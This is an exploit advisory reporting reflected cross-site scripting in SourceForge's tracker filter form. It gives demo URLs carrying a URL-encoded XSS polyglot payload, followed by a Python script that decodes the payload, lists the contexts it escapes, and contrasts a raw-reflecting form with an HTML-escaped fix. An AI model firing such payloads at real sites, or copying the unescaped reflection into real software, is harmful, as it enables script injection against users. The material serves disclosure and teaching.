# Exploit Title: SourceForge.net Cross Site Scripting
# Date: 3.03.2012
# Author: Sony
# Software Link: http://sourceforge.net/
# Google Dorks: sourceforge.net/tracker/index.php?group_id= bugs or tracker
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/03/sourceforgenet-cross-site-scripting.html
..................................................................

Reflected cross-site scripting in /tracker/index.php?group_id= on http://sourceforge.net.
The XSS is in the tracker filter form (the ID field, submitted with the Filter button): the
values of the keyword and artifact_id parameters are reflected into the page without encoding,
so the payload in the demo URLs below executes when the filtered tracker page is loaded.
It's not a critical bug.

Demo (payload in the keyword parameter):
http://sourceforge.net/tracker/?limit=25&func=&group_id=311&atid=100311&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=&assignee=&status=&category=&artgroup=&submitter=&keyword=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&artifact_id=&submit=Filter

Screenshots:
http://2.bp.blogspot.com/-tfY-iwvmUrQ/T1FDmWohhLI/AAAAAAAAArA/C2KrpgWqces/s1600/SquirrelMail1.JPG
http://3.bp.blogspot.com/-qq6BZi2F5Mc/T1FDpuw1koI/AAAAAAAAArM/8QSjxXTc1-o/s1600/SquirrelMail2.JPG

Demo (payload in the artifact_id parameter):
http://sourceforge.net/tracker/?limit=25&func=&group_id=1&atid=350001&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=&assignee=&status=&category=&artgroup=&submitter=&keyword=&artifact_id=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Filter

Screenshot:
http://1.bp.blogspot.com/-jLrI8ujiA9U/T1FFFOLFZOI/AAAAAAAAArY/0FD89GMK4oM/s1600/idd.JPG
..................................................................
InSecurity.Ro Because we care, we're security aware!
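The payload in the demo URLs is a generic XSS polyglot: it closes a single-quoted JavaScript string, a double-quoted one (with and without a preceding backslash), an HTML comment, an open SCRIPT block and an attribute value, then injects its own SCRIPT element, so it fires whichever of those contexts the filter value is reflected into. The script below, an added example that is not part of the advisory and not SourceForge's code, decodes the keyword payload from the first demo URL, reports which contexts it targets, and renders it through a hypothetical reconstruction of the tracker filter form twice: once reflecting the value raw, as the advisory shows the tracker doing, and once with HTML attribute encoding, which is the fix. The form markup, the function names and the trimmed demo URL are assumptions; the encoded payload is copied verbatim from the advisory.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Encoded `keyword` value copied from the advisory's first demo URL.
# The bare backslashes are part of the payload (written as \\ in this string literal).
ENCODED_PAYLOAD = (
    "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\\%27%3Balert%28String.fromCharCode"
    "%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\\%22"
    "%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E"
    "%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E"
)

# Constructed demo URL: same path and parameter names as the advisory, with the repeated
# blank `keyword=` the advisory's URL also carries, trimmed to the parameters that matter.
DEMO_URL = (
    "http://sourceforge.net/tracker/?limit=25&func=&group_id=311&atid=100311&keyword="
    "&artifact_id=&keyword=" + ENCODED_PAYLOAD + "&artifact_id=&submit=Filter"
)


def filter_params(url):
    """Decode the tracker filter fields from the query string.

    A parameter may appear more than once (the advisory's URL sends `keyword=` twice);
    PHP keeps the last occurrence, so that is the one taken here.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[-1] for name, values in qs.items()}


def payload_contexts(decoded):
    """Which reflection contexts the polyglot is built to break out of."""
    return {
        "js_single_quoted": decoded.startswith("';"),       # closes '...' string, then //
        "js_single_quoted_escaped": "\\';" in decoded,     # survives a preceding backslash
        "js_double_quoted": '";alert' in decoded,           # closes "..." string
        "js_double_quoted_escaped": '\\";' in decoded,
        "html_comment": "-->" in decoded,                   # closes <!-- ... -->
        "script_block": "</SCRIPT>" in decoded,             # closes an open <script>
        "attribute_value": '">' in decoded and "'>" in decoded,
        "injects_script": "<SCRIPT>" in decoded,
    }


def render_filter_form_vulnerable(params):
    """Hypothetical filter form that reflects the values raw, as the advisory shows the
    tracker doing. The decoded payload lands inside value="..." and the `">` in it closes
    the attribute and the tag, leaving <SCRIPT>...</SCRIPT> as live markup."""
    return (
        '<input type="text" name="keyword" value="%s">\n'
        '<input type="text" name="artifact_id" value="%s">\n'
        '<input type="submit" name="submit" value="Filter">'
    ) % (params.get("keyword", ""), params.get("artifact_id", ""))


def render_filter_form_fixed(params):
    """Same form with HTML attribute encoding applied to the reflected values.

    html.escape(quote=True) encodes < > & " and ', so nothing in the value can close the
    attribute or start a tag; the browser still shows the original text in the field."""
    esc = lambda s: html.escape(s, quote=True)
    return (
        '<input type="text" name="keyword" value="%s">\n'
        '<input type="text" name="artifact_id" value="%s">\n'
        '<input type="submit" name="submit" value="Filter">'
    ) % (esc(params.get("keyword", "")), esc(params.get("artifact_id", "")))


def reflects_raw_script(page):
    """Cheap check for the advisory's symptom: the injected SCRIPT element survives verbatim."""
    return "<SCRIPT>" in page and "</SCRIPT>" in page


if __name__ == "__main__":
    params = filter_params(DEMO_URL)
    print("decoded keyword:", params["keyword"])
    for ctx, hit in payload_contexts(params["keyword"]).items():
        print("  %-26s %s" % (ctx, hit))
    print("raw reflection executes :", reflects_raw_script(render_filter_form_vulnerable(params)))
    print("encoded reflection executes:", reflects_raw_script(render_filter_form_fixed(params)))
```

The same functions apply to the second demo URL, where the payload sits in artifact_id instead of keyword; the contexts reported are identical because the polyglot does not depend on which field is reflected. Note that attribute encoding is the right fix only for the attribute context shown here; a value reflected inside a script block needs JavaScript string encoding instead.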